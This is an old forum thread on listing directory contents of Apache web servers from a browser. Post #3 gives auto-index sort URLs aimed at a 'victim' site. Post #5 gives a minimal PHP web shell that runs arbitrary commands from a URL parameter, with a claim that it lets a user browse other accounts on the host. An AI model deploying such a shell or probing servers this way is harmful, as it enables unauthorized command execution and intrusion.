|
-
March 31st, 2002, 12:15 PM
#1
Member
File listing with an apache server
Is it possible to get the file listing of any directory on an apache-based web server ?
I mean is it possible to get the equivalent of ls using only a browser ?
-
March 31st, 2002, 12:35 PM
#2
yes and no only if the server hasnt been configured properly if the short of it is if their isnt a index file its posible but u can turn the option of virtual listings off but it depends on the webmaster hehe and limp1058 aint to good at it lmao sorry had to do it
RiOtEr
-
March 31st, 2002, 01:50 PM
#3
http://www.victim.com/?C=N&O=D
Sort Files By Name
http://www.victim.com/?C=M&O=A
Sort Files By Last Modified
http://www.victim.com/?C=S&O=A
Sort Files By Size
http://www.victim.com/?C=D&O=A
Sort Files By Description
As RiOtEr said, this only works if the server has been configured improperly... But you wouldnt believe how many servers have this bug unpatched 
-
March 31st, 2002, 04:18 PM
#4
Member
Ok thx guys. I gonna test it right now
[blur]On a toujours besoin d\'un plus petit que soi. [/blur]
French diction
-
March 31st, 2002, 04:20 PM
#5
Member
Script Kiddie(ing) is the easiest way perhaps...
If the server allows php to be used, put the below code in a file named asa.php and upload it.
Once uploaded, you may do almost anything on the server, including -but not limitet to- browsing other accounts on the host, and the host's own files;
PHP Code:
<?php
system($cmd);
?>
go to the url http://somesite.co/asa.php?cmd=ls
You will see the ls output in the screen...
 
-
March 31st, 2002, 04:22 PM
#6
Member
Well, the servers I tested were patched...  At least, my web site is protected against this vulnerability... 
[blur]On a toujours besoin d\'un plus petit que soi. [/blur]
French diction
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
